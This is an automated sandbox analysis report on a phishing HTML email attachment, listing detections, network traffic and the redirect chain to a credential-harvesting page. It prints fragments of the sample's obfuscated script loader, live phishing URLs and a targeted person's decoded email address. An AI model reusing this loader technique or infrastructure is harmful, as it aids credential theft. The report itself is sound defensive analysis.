Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Electronic_Receipt_ATT0001.htm

Overview

General Information

Sample name:Electronic_Receipt_ATT0001.htm
Analysis ID:1522865
MD5:b1de484f37a8c1e01bf73e7715497d90
SHA1:69896e52b0f5f24a1b9c92925d5ada7e300e3f18
SHA256:937fd7b138665e64f179bb91b9ec4bf3622d7963bb79f925bea3ef0a4650c792
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
Detected javascript redirector / loader
HTML document with suspicious name
Connects to many different domains
Connects to several IPs in different countries
Detected non-DNS traffic on DNS port
Executes massive DNS lookups (> 100)
HTML body with high number of embedded SVGs detected
HTML page contains hidden javascript code
HTML page contains string obfuscation
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 5320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Electronic_Receipt_ATT0001.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: Electronic_Receipt_ATT0001.htmHTTP Parser: Low number of body elements: 0
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: Total embedded SVG size: 130835
Source: Electronic_Receipt_ATT0001.htmHTTP Parser: Base64 decoded: tsalcido@stinsons.com
Source: file:///C:/Users/user/Desktop/Electronic_Receipt_ATT0001.htmHTTP Parser: Found new string: script .yak = `#dHNhbGNpZG9Ac3RpbnNvbnMuY29t`;.giraffe = ['w','ri','te'].join('') /* peacock */; .robin = ['<s','cri','pt s', /* hippo */'rc='].join(''); ..nutcracker=["htt", /* jackfruit */ "ps://","lipsoft",`inc`,'.in/re',"s444",`.ph`,`p?2-687`,'474707', /* date */ . /* <i hidden> The child learned to ride a bike. <i> */ .'33a2',`f2f6872`, /* fennec */ `65662e`, /* barracuda */ . /* <strong> The gardener harvested fresh vegetables from the garden. <strong> */ .`6c692f`, /* oriole */ . /* <h5> She designed a new logo for the company. <h5> */ .`3f6`, /* jaguar */ `87474707`,'33a2f2', /* lotus */ 'f48466',"a2e726","f6e",`746`, /* kelp */ "973",`68`, /* vulture */ . /* <i hidden> The cat purred contentedly in her lap. <i> */ ."6574", /* tapir */ . /* <b> The children went on a school field trip. <b> */ .`2e72752f`,`69`, /* kudu */ . /* <nav hidden> The chef experimented with new flavors in the kitche...
Source: https://lipsoftinc.in/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f48466a2e726f6e7469736865742e72752f694361577a6a36512f-yakHTTP Parser: var didvmdtgabbkysov = document.createelement("script");didvmdtgabbkysov.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(didvmdtgabbkysov);didvmdtgabbkysov.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoidulgvtdws0drrxrku1h6xc9lnndyvfb5nxhqq1lywfjveec3q3zwbkzyzfveyuzkalvywllmy1vqq0jvk2dkzwlyqljpvxn6vlo4n2fuakrxnmzcl1vgnupkqndpzepqd2rwz1ldttbybhhxuzjivnnicmvwa2nqwglqyw9vwtrhmjk5sk00a0s1ahhaoxjpmlwvdmzwbys3y2jkvg1wmwswckl1bwremwq4u01sau9wrvhuzedxb0ldmuhxk1hiukixdtnzshpzrgnvwdjmbfjavklrserloct3u01czm1tb1jzdfhzn0o0t0dmyuo5sjjmdlbkc05hmm91dnbwaezsvnlrz0fsnnnpb1jivmy4a3ywoxi1ajrpr25tsjnrs0tzd1wvs3dmyzvgbddrclwvt0zznddcl0vonmhobmd5dctwmwjfblzbuvpdq1wvehlpm1cyavfsk1wvsfnjzlwvzjbmeedttfvoewl6vlzosfvmbljfvmludvhwrfa0ae1mbxvta1plb0rclzh4uwtjtkr3mepruhhdbk1ybmncq2tik2ranwlssvlov1vgugvkztdkttz0k3hjugvyynmyvndqz09cl0rrdw5avvn0bupjmthrznzon0lpwdfxnwhpahh0d3dpk0xvnzdrt3fkce80bfwvymrmmhjcl0pevuzcl3m3aetyrfwvv1wvcfwvv0rgaehdqnbdsulpztbhof...
Source: https://hfj.rontishet.ru/iCaWzj6Q/#C#dHNhbGNpZG9Ac3RpbnNvbnMuY29tHTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://www.yahoo.com/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: https://finance.yahoo.com/sectors/basic-materials/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:50028 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.228.174.117:443 -> 192.168.2.4:51942 version: TLS 1.2
Source: unknownNetwork traffic detected: DNS query count 221
Source: unknownNetwork traffic detected: IP country count 10
Source: global trafficTCP traffic: 192.168.2.4:50042 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:50393 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:50495 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:52105 -> 1.1.1.1:53
Source: global trafficDNS traffic detected: number of DNS queries: 221
Source: Joe Sandbox ViewIP Address: 199.232.211.52 199.232.211.52
Source: Joe Sandbox ViewIP Address: 3.160.150.30 3.160.150.30
Source: Joe Sandbox ViewIP Address: 99.80.51.253 99.80.51.253
Source: Joe Sandbox ViewIP Address: 212.82.100.137 212.82.100.137
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f48466a2e726f6e7469736865742e72752f694361577a6a36512f-yak HTTP/1.1Host: lipsoftinc.inConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f48466a2e726f6e7469736865742e72752f694361577a6a36512f-yak HTTP/1.1Host: lipsoftinc.inConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?https://HFj.rontishet.ru/iCaWzj6Q/ HTTP/1.1Host: href.liConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /iCaWzj6Q/ HTTP/1.1Host: hfj.rontishet.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://hfj.rontishet.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cb5e237ab880f47&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: hfj.rontishet.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hfj.rontishet.ru/iCaWzj6Q/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5Raks1QVVvbFZaaTNjUzBLdzQvN3c9PSIsInZhbHVlIjoiem1xeTJBSTJtSkJjTy9jN3k4Z0JBdVdQbjY5Smo5RkptVzhzbkxIR3d4U1lvM25IQjducmt4Sm9aSHJhbmg2WHhMSk00c2NKK1lRdm9PNi9hanpIRVVBT2NORFowbm1GMTdtbklXbm1LdlZxV2Q5dGh1MFRXcXlZOExaU0FNZmIiLCJtYWMiOiI1ODIyZjIxMjc0ZDgwMDcwM2FkMzgwOTc2ZGNmM2I1YmU2NjliMzFmY2Q3NDkxNmU0OTc4NmI4ZmRhNmZlYWRkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImsrMXNBNUNEaW1GbytaZE1iOHZDWEE9PSIsInZhbHVlIjoiUGVVUStFU1puM2VIRUpxRDVweFduS3JPaytmR3d0SlpEcmR4MjJFWmdnOGtXRDlFdm52RUg4M3JmTjJwUDZPYXJGWEhCc3F3TnQ0cVcwSU5tcUdlN0lLTWlmTmNCT0QrRkhGZUxYVTR2UGxJdjg0R1NTNUppUTNyMnpQOEpodW4iLCJtYWMiOiIyNjNiNDVlNmVlODI1Yjk4Y2RmMDhjNjNlNTI0Mjk3NjQwNmQ3ZDU5ZGYwMWNkNzQ2NTYxMmNkMWZlYWZmZWNiIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cb5e237ab880f47&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
